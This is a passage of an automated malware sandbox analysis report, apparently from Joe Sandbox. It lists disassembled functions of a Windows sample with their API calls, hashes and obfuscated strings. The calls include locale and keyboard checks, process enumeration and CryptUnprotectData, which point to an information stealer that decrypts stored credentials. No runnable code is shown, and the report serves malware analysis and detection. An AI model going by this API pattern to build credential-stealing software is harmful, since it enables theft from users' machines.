                                • Instruction ID: 9f40c0fdcbdd382ef995c00b4063761c0f101be0886300a01e0be56885affa4f
                                • Opcode Fuzzy Hash: 2891f02b69f24d22f7948feb2885a5926b7706af98573b4fb2d61f46241cdd67
                                • Instruction Fuzzy Hash: 94316BB16611169BCB62FF29EC95EDE77B7BF41700F000269FA4997622EB30DC018B94
                                APIs
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006C2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006C2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006C2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006C2DEC
                                • LocalFree.KERNEL32(00000000), ref: 006C2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 2fb153ff2a95dabae8e76e123604df48e3f86a4bf916eb17232c0243a851aeb7
                                • Instruction ID: f5a26a74f2e8df297f3bbd37819f7082a1d2b6f54d248c76448fad1f18265a4c
                                • Opcode Fuzzy Hash: 2fb153ff2a95dabae8e76e123604df48e3f86a4bf916eb17232c0243a851aeb7
                                • Instruction Fuzzy Hash: BDB1F771901215CFDB15DF14C948BA9B7B2FB44324F29C1AED809AB3A2D7769D82CF84
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: H];$OTF/$QO6$W~{$y:/=$C-~$U<U
                                • API String ID: 0-400207225
                                • Opcode ID: c2037272d7db61f3f6a676bed8a3cd3aa5a51f7c20e9e6626aa0322356eefe04
                                • Instruction ID: 85890c9b2f1d938ad1805dd5bad652798365bbccdf4f8beae6d43ab2bb8bf490
                                • Opcode Fuzzy Hash: c2037272d7db61f3f6a676bed8a3cd3aa5a51f7c20e9e6626aa0322356eefe04
                                • Instruction Fuzzy Hash: CBB205F360C2009FE304AE2DEC8567ABBE9EF94720F16893DE6C5C7744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !imm$&pW~$5VH$\o3$a_7{$jVww$jVww
                                • API String ID: 0-1153863318
                                • Opcode ID: fefa620d9d5345f65c4dac43bc6a79e878ed98890181577410d450ff42155b06
                                • Instruction ID: d4d0183c0f8e5aa7440e7e3a4e77c743a1c9126786943c30d5a265f5a0a55491
                                • Opcode Fuzzy Hash: fefa620d9d5345f65c4dac43bc6a79e878ed98890181577410d450ff42155b06
                                • Instruction Fuzzy Hash: A5B2F7F390C200AFE704AE29EC8567AFBE5EF94720F16893DE6C5C3744E63598448697
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %"]u$%u>{$(=w$5Vs$fM_$8
                                • API String ID: 0-1977447844
                                • Opcode ID: 5b275f4e2deb3880aecb8e3abd9daf60beba40399cb1a606730020d7402087b4
                                • Instruction ID: 7b8a58d08f46d0c4d1e12ac0fc274fbf1db06b82bb29399f84e5173675905eed
                                • Opcode Fuzzy Hash: 5b275f4e2deb3880aecb8e3abd9daf60beba40399cb1a606730020d7402087b4
                                • Instruction Fuzzy Hash: 0CB217F3A082049FE304AE2DEC8577AF7E9EF94720F16453DEAC4C3744EA3599058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Ai6^$REo$aLw_$fXh>$v"K$Z=
                                • API String ID: 0-1719109772
                                • Opcode ID: 30d8ca99bb88d8c2b009a6f7e41fd3126a9dbd7887a61efd4ff978485bcb58a5
                                • Instruction ID: b96828f087aefd38845af6369897e95ce53495277f23a33e033bfb6196cea9f2
                                • Opcode Fuzzy Hash: 30d8ca99bb88d8c2b009a6f7e41fd3126a9dbd7887a61efd4ff978485bcb58a5
                                • Instruction Fuzzy Hash: 09B207F360C2049FE304AE2DEC8567AB7E9EFD4320F16893DE6C5C7744EA3598058696
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006C2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 006C2C58
                                • wsprintfA.USER32 ref: 006C2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 7968de79b0e166137ee79efccbec60dc0ec075f6d099c4acd8730d7e2f924b46
                                • Instruction ID: bd24e34e91e03e8b521b8e6ca7a6a6bfd3f78821fa772f6d91e8e0f660a79ef5
                                • Opcode Fuzzy Hash: 7968de79b0e166137ee79efccbec60dc0ec075f6d099c4acd8730d7e2f924b46
                                • Instruction Fuzzy Hash: B201A271A40614ABDB189F58DC4AFAABB6AEB84721F00436AF916DB7C0DB7419048AD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8}|$>{pK$HiQ$X5n\${eoj
                                • API String ID: 0-2167095355
                                • Opcode ID: 66e35838ec03581fa2c6ef1107f603306540de394ab9bc28dcbcb178c196cfcb
                                • Instruction ID: a9c94b0a0115b0345bffed8bb70ddedc3db976aa18382e96050f655852be8d6b
                                • Opcode Fuzzy Hash: 66e35838ec03581fa2c6ef1107f603306540de394ab9bc28dcbcb178c196cfcb
                                • Instruction Fuzzy Hash: 3EB2FAF3A082049FD304AE2DEC8567AFBEAEFD4720F16853DE6C4C7744E93558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2d/l$7Wt$Fq3}$adno$l4[
                                • API String ID: 0-2989521349
                                • Opcode ID: 8a83acadfe9fa14de6da7d29d83d9170696b5a4e49a2c9f59a248f25ee5af7cb
                                • Instruction ID: 4d2f9739acfad4f87ed61a4a642441ad1a6919f3061501376d45c26c8719bc7c
                                • Opcode Fuzzy Hash: 8a83acadfe9fa14de6da7d29d83d9170696b5a4e49a2c9f59a248f25ee5af7cb
                                • Instruction Fuzzy Hash: E8B2F4F360C2049FE304AE29EC8577ABBE5EF94320F16493DEAC5C3744EA3598458697
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !qN$(p|;$Air$XFu?$6M}
                                • API String ID: 0-3187002293
                                • Opcode ID: cc099820baf1afab2760ea372672f4bc9cbab209dc4071c628dfd26045e22345
                                • Instruction ID: 61b5ecf8c771e41804f5a8db4f3ed191634c59d80ff214dc04162a7ac7fceae6
                                • Opcode Fuzzy Hash: cc099820baf1afab2760ea372672f4bc9cbab209dc4071c628dfd26045e22345
                                • Instruction Fuzzy Hash: D8A217F360C2049FE7046E2DEC8567ABBE9EF94720F1A853DE6C4C3744EA3598058796
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006A775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006A778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006A77AD
                                • LocalFree.KERNEL32(?), ref: 006A77B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 29b8e59697f6078ec76b53ab7a5113d5a183bbbbec22379607d4f75b77f4293e
                                • Instruction ID: cfb149b92c60783cd0c70999ba8eb0f11fbe953442c0cfb8957c3e652cf86f71
                                • Opcode Fuzzy Hash: 29b8e59697f6078ec76b53ab7a5113d5a183bbbbec22379607d4f75b77f4293e
                                • Instruction Fuzzy Hash: A5011E75B41318BBEB10DB94DC4AFAA7B79FB44B11F104159FA09EB2C0DAB0AD00CB90
                                APIs
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C3ABF
                                  • Part of subcall function 006C7310: lstrlen.KERNEL32(------,006A5BEB), ref: 006C731B
                                  • Part of subcall function 006C7310: lstrcpy.KERNEL32(00000000), ref: 006C733F
                                  • Part of subcall function 006C7310: lstrcat.KERNEL32(?,------), ref: 006C7349
                                  • Part of subcall function 006C7280: lstrcpy.KERNEL32(00000000), ref: 006C72AE
                                • CloseHandle.KERNEL32(00000000), ref: 006C3BF7
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: d1e9758fed086ac37db20d293655d3f918ab045ce686965728eed221303d2b61
                                • Instruction ID: a8d3d4c595c0548915aad927858aeffd01e5a0330ea566026823074874b3f7c6
                                • Opcode Fuzzy Hash: d1e9758fed086ac37db20d293655d3f918ab045ce686965728eed221303d2b61
                                • Instruction Fuzzy Hash: A881E730905225CFCB14DF19D948BA5B7B2FB54319F29C1AED4089B3A2D7769D82CF84
                                APIs
